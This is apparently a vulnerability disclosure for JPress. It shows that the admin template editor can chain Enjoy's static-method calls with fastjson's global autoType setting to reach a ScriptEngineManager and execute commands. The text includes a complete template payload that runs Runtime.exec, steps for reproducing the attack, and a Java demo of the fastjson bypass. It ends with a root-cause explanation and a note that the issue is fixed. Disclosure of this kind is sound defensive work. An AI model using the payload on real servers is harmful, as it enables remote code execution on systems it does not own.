Audit process

The JPress admin back end has a template-editing feature. It does apply some filtering, so we use fastjson to help us obtain a `ScriptEngineManager`, then execute arbitrary JS code, which gives RCE. The payload is as follows:

```
#set(x=com.alibaba.fastjson.parser.ParserConfig::getGlobalInstance()) #(x.setAutoTypeSupport(true)) #(x.addAccept("javax.script.ScriptEngineManager")) #set(x=com.alibaba.fastjson.JSON::parse('{"@type":"javax.script.ScriptEngineManager"}')) #set(e=x.getEngineByName("js")) #(e.eval('java.lang.Runtime.getRuntime().exec("calc")'))
```

Demo

Log in to the back end with a weak password, edit the `article` template and insert the payload given above.
Click "Update file".
Visit http://localhost/article/1; the calculator pops up, confirming the result.
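The template directives above chain two separate things: the Enjoy template engine's `Class::staticMethod` syntax, which lets the template reach any class on the classpath, and fastjson's process-wide `ParserConfig`, which the payload mutates so that a `@type` of `javax.script.ScriptEngineManager` is accepted. The Java program below is an added illustration (not code from the issue or from JPress) that reproduces only the fastjson half outside the template: with the default global config the `@type` is rejected, and after the same two calls the payload makes, the same JSON string yields a live `ScriptEngineManager`. It assumes fastjson 1.2.x on the classpath and a JDK that still ships a JavaScript engine (Nashorn, JDK 8 to 14); on newer JDKs `getEngineByName("js")` returns `null`.

```java
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONException;
import com.alibaba.fastjson.parser.ParserConfig;

import javax.script.ScriptEngine;
import javax.script.ScriptEngineManager;

/**
 * Added example: shows why the payload has to call setAutoTypeSupport(true)
 * and addAccept(...) before JSON.parse can hand back a ScriptEngineManager.
 * The global ParserConfig is mutable, JVM-wide state, so any code that can
 * call static methods (here: a template) can weaken it for the whole app.
 */
public class FastjsonAutoTypeDemo {

    // The exact JSON the issue's payload passes to JSON::parse.
    static final String TYPE_JSON =
            "{\"@type\":\"javax.script.ScriptEngineManager\"}";

    /** Step 1: under fastjson's default global config the @type is refused. */
    static boolean rejectedByDefault() {
        ParserConfig cfg = ParserConfig.getGlobalInstance();
        if (cfg.isAutoTypeSupport()) {
            return false; // something already flipped the global switch
        }
        try {
            JSON.parse(TYPE_JSON);
            return false; // would mean autoType is effectively on
        } catch (JSONException e) {
            // e.g. "autoType is not support. javax.script.ScriptEngineManager"
            return true;
        }
    }

    /** Step 2: the payload's two calls, then the same parse succeeds. */
    static Object afterPayloadCalls() {
        ParserConfig cfg = ParserConfig.getGlobalInstance();
        cfg.setAutoTypeSupport(true);                         // global switch
        cfg.addAccept("javax.script.ScriptEngineManager");    // allow-list entry
        return JSON.parse(TYPE_JSON);                         // now an object
    }

    public static void main(String[] args) {
        System.out.println("rejected by default: " + rejectedByDefault());

        Object o = afterPayloadCalls();
        System.out.println("after payload calls: " + o.getClass().getName());

        if (o instanceof ScriptEngineManager) {
            // The issue's payload calls e.eval(...) with Runtime.exec here;
            // this demo only checks that the JS sink is reachable.
            ScriptEngine js = ((ScriptEngineManager) o).getEngineByName("js");
            System.out.println("js engine available: " + (js != null));
        }
    }
}
```

Because `ParserConfig.getGlobalInstance()` is shared by every fastjson call in the JVM, the two calls in `afterPayloadCalls` leave autoType enabled for the rest of the process, not just for the request that rendered the template. Filtering template text for specific class names does not address this; the template engine must not be allowed to invoke arbitrary static methods at all.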
This has been fixed in the latest version of jpress.